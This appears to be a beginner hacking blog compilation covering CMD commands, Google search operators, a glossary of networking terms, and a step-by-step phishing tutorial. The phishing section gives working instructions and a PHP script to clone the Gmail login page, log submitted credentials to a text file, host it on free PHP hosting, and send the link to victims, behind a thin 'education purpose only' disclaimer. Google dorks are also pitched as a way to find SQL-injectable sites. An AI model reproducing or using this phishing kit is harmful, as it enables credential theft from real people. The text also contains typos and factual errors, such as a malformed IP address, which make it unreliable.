Command Prompt Tips

We all use command prompt for many tasks.

So what is CMD?
Command Prompt (executable name cmd.exe) is the Microsoft-supplied command-line interpreter on OS/2, Windows CE and on Windows NT-based operating systems.

Professinal Hackers extensively use CMD to hack and gain acesses to windows, so one one must have a good knowledge about CMD in order to become a pro-hacker.

Here is a list of some CMD commands:

1. ipconfig

This is the top most command for seeing the ip address,subnet mask and default gateway also includes display and flush DNS cache, re-register the system name in DNS.. This will most useful tool for viewing and troubleshooting TCP/IP problem.

2. systeminfo
Have a need to display operating system configuration information for a local or remote machine, including service pack levels? Then systeminfo is the tool to use. This command gives all the info including: host name, OS type, version, product ID, install date, boot time and hardware info (processor and memory).

5. netstat
Then netstat is the tool you want to run. The output provides valuable information of all connections and listening ports, including the executable used in the connections. In additon to the above info, you can view Ethernet statistics, and resolve connecting host IP Addresses to a fully qualified domain name.

6. nslookup

nslookup can be a valuable tool for testing and troubleshooting DNS servers.
For Eg., [nslookup google.com]  diplays the adresses and other info. 

8. ping

These tools can be helpful with connectivity to other systems. Ping will test whether a particular host is reachable across an IP network.

For Eg. [ping google.com] Displays the IP adresses of Google.com.

9. eventvwr.msc

this will open up event displayer which can be used to view the activity done on the computer. 

Google Dorks

Google Dorks

Google!!!

One of the most used search engine of all time. Problems to our all solution is to "Google up everything" or what is now popularly called as "Googling" . We use google for almost everything, it has now become an integral part of our life. 

But do you know how to use it efficiently,sometime you want to search for something and messed up with clicking on everylink that appears on the search result. And even after searching for hours you don't get satifactory result.

That was what you used to do before, from now you will probably be using google dorks for fast and efficient search.

For eg.  okay lets suppose that you wanna search for ebooks on topic 'networking' , our obvious search queries would be like this "Networking ebooks", "free ebooks for networking" etc,we keep going into the websites, clicking on link after links and then get proper downling links. Now lets do the same search in a different way , type on google "ext:pdf networking" (without quotes). So how about that, impressed yet.!!

If you are new in Hacking, maybe it will be a new term for you. But it is very famous in hackers world now a days.Actually its all are google search opreators, means hackers are taking benefit of google search techniques.

Some of basic operators:

     1.site: It returns the websites of specified domains.

         For Eg. [site:Google.com] will return the links of webpages of domain google.com.

     2. info: It will present information that Google has about that web page.

         For Eg., [info:www.google.com] will show information about the Google homepage. 

     3.inurl-It restricts the results to sites whose URL's contains specified phrase.

         For Eg: [inurl:coe-roorkee.com: contact us]  give you the contact details of the website.

     4.cache: It returns the cached webpage retain by google. 

         For Eg. [cache:facebook.com] will display a cache page of facebook.

     5.ext- It specifies the extension of file type. 

       For Eg. [ext:pdf] will disaply all pdf files related to hacking and ext:ppt will give ppts for hacking. 

     6. related- It returns the websites similar to specified websites.

        For Eg.[related:google.com] will list all the search engines in the search result.

    7. define:It will provide a definition of the words you enter after it, gathered from various online sources.

        For Eg: [define:Hacking} will define the meaning of hacking.

    8.link:It will list webpages that have links to the specified webpage

       For Eg.  [link:www.google.com] will list webpages that have links pointing to the Google homepage. 

Google Dorks can be used to find the vulnerability in the sites. Hackers use google dorks to find SQL vulnerability in sites. 

I'll disscuss how to use google dorks for SQL injection in later posts. 

How To Hack using Phishing Method

What is Phishing?

Phishing is the process of stealing sensitive information, such as usernames, passwords, and bank information, by pretending to be someone you’re not. An example of this would be if you receive and e-mail from a hacker pretending to be your bank. In this e-mail, it might tell you that you need to update your account before it expires, and then the hacker provides a link. Once you click on the link, you arrive at a website that looks exactly like your actual bank page. In reality it’s just a perfect replica, and when you input your login details, it sends it to the hackers email or stores it on his web server. Hackers that create the best, most deceiving phishing web pages are knowledgeable in the area of HTML and the PHP programming. Below I will show a simple example of some of the steps a hacker might take to create a phishing website. By seeing the steps a hacker would take, will help you defend against such an attack.

Note: This is for education purpose only.

Follow the following steps:

1. First the hacker chooses a target. The most popular targets for phishing attacks are e-mail services such as Hotmail, facebook and Gmail because they are the most common and once a hacker gets access to your e-mail, he also gets access to a load of other user information for all the other websites you use. In this example we will pretend the hacker chose Gmail as his target.

2. After choosing his target, the hacker will go to the website and save the whole main page. I use Mozilla Firefox ,(highly recommend using this browser for its security and customization.) So I would go to www.gmail.com and click File -> Save page as… , or simply hit <CTR> + S which does this automatically. Choose where you would like to save the web page and hit Save.

3. Next the hacker would create a PHP script to do his dirty deed of steeling your information. Below is a simple PHP script that logs and stores your login details when you click “Sign in”. To see how it works, copy and paste the following code into notepad. Next save it into the same directory as you saved the Gmail page, and name it phish.php. It should make a PHP file in the folder. If you dont find any PHP file than save the file with quotations like "phish.php" , it should make a php file.

 In addition to the phish.php page, create a new empty text file and name it list.txt.

CODE:

------------------------------------------------------------------------------------------------------------

<?php
header("Location: http://www.gmail.com.com");
$handle = fopen("list.txt", "a");
foreach($_GET as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
------------------------------------------------------------------------------------------------------------

So far you should see the following in your folder:

4. Now the hacker would have to edit the main Gmail page to include his PHP script. To see what the hacker would do, open up the main Gmail page named ServiceLogin.htm with notepad.

5. Hit <CTR> + F , or go to Edit -> Find , type in action and hit “Find Next”.

6. This will highlight the first occurrence of the word “action” in the script and you should see the following:

There are two “action” occurrences in the script so make sure you have the right one by looking at the “form id” name above. Change the link between action = “ “ to phish.php . This will make the form submit to your PHP phish script instead of to Google. After the link you will see the code:

Change the word “POST” to “GET” so that it looks like method=”GET”. What the GET method does is submit the information you type in through the URL so that the PHP script can log it.

7. Save the  file and.rename ServiceLogin.htm to index.htm. The reason you want to name it “index” is so when you upload it to a web host and someone goes to your link, the index page is the first page that shows up.

8.Now you'll need a free web hosting service that supports PHP. 

Go to http://www.google.com and search for free web hosting websites.

Choose any one of a website. I'll reccommend to choose either 00webhost.com or 5gbfree.com(I used this one). 

9.Sign Up for a free account. After Signing up, go to the website and than login with your account.

It will take you to the C-panel X, . there go to the file manager and choose webroot as directory.

 A new tab will open up. There up load all the file index.html, list.txt and PHP file. 

When uploading change the permission of the list.txt to 777 by ticking all the boxes. 

Now your website is read for phishing. 

Now send the your website domain name to the salve. You can find the domain name of your wesite in the C-panel. 

Whenever someone will login with you fake page its user name and password will be saved in list.txt, you can go to file manager and view it from there.

If any problem persist let me know in the comments. 

Terms One should know

                    Some Common must known Terms

What is Hacker:

A hacker is someone who likes to tinker with electronics or computer systems. Hackers like to explore and learn how computer systems work, finding ways to make them do what they do better, or do things they weren’t intended to do.

There are two types of hackers:

White Hat – These are considered the good guys. White hat hackers don’t use their skills for illegal purposes. They usually become Computer Security experts and help protect people from the Black Hats.

Black Hat – These are considered the bad guys. Black hat hackers usually use their skills maliciously for personal gain. They are the people that hack banks, steal credit cards, and deface websites.

These two terms came from the old western movies where the good guys wore white hats and the bad guys wore black hats.

Now if you’re thinking, “Oh boy! Being a black hat sounds awesome!”, Then I have a question for you. Does it sound cool to live in a cell the size of your bathroom and be someone’s butt buddy for many years? That’s what I thought.

Hacker Hierarchy

Script kiddies – These are the wannabe hackers. They are looked down upon in the hacker community because they are the people that make hackers look bad. Script kiddies usually have no hacking skills and use the tools developed by other hackers without any knowledge of what’s happening behind the scenes.

Intermediate hackers – These people usually know about computers, networks, and have enough programming knowledge to understand relatively what a script might do, but like the script kiddies they use pre-developed well-known exploits (- a piece of code that takes advantage of a bug or vulnerability in a piece of software that allows you to take control of a computer system) to carry out attacks

Elite Hackers – These are the skilled hackers. They are the ones that write the many hacker tools and exploits out there. They can break into systems and hide their tracks or make it look like someone else did it. You should strive to eventually reach this level.

IP Adresses:

 An Internet Protocol address (IP address) is a numerical label assigned to each device (e.g., computer, printer). Every Computer connected to Internet has a unique number by which is its identity over the internet. An IP address serves two principal functions: host or network interface identification and location addressing. By IP addresses we communicate on the internet.
A Typical IP Addresses looks like following 121:14:11:12.
You can find your computer's IP Addresses by clicking here HERE.

Domain Name System (DNS) Lookup:

The Process of converting a domain name into its respective IP Addresses. Whenever you type a web addresses, the browser automatically performs a DNS lookup for that website.

DNS Server:

DNS server is a server which will handle the DNS Lookup querry done by the browser. DNS server can be locally installed in any specific organisation.

Port:

In computer hardware, a port serves as an interface between the computer and other computers or peripheral devices. It is usually used in exchanging data. Ports can be external(Hardware) Eg. USB port or may in Virtual.

Virtual port are usually used by web applications to communicated with the servers.

HTTP:

Hyper Text Transfer Protocol is the protocol used by browsers to communicated with the browsers.

HTTPS is the secure form of HTTP usually used for establishing a secure connection when highly sensitive data communication occurs.

Porxy Servers:

A proxy Server is a server that acts as an intermediary for requests from clients seeking resources from other servers. Whenever client send some request for any website it is forwarded to the proxy server and than proxy server foreword this request to the server.

A proxy server has a variety of potential purposes, including:

• To keep machines behind it anonymous, mainly for security.
• To speed up access to resources (using caching). Web proxies are commonly used to cache web pages from a web server.
• To prevent downloading the same content multiple times (and save bandwidth).
• To log / audit usage, e.g. to provide company employee Internet usage reporting.
• To scan transmitted content for malware before delivery.
• To scan outbound content, e.g., for data loss prevention.
• Access enhancement/restriction
• To apply access policy to network services or content, e.g. to block undesired sites.
• To access sites prohibited or filtered by your ISP or institution.
• To bypass security / parental controls.
• To circumvent Internet filtering to access content otherwise blocked by governments.

At last the most important one...

What does it take to become a hacker?

Becoming a great hacker isn’t easy and it doesn’t happen quickly. Being creative helps a lot. There is more than one way a problem can be solved, and as a hacker you encounter many problems. The more creative you are the bigger chance you have of hacking a system without being detected. Another huge
8
quality you must have is the will to learn because without it, you will get nowhere. Remember, Knowledge is power. Patience is also a must because many topics can be difficult to grasp and only over time will you master them.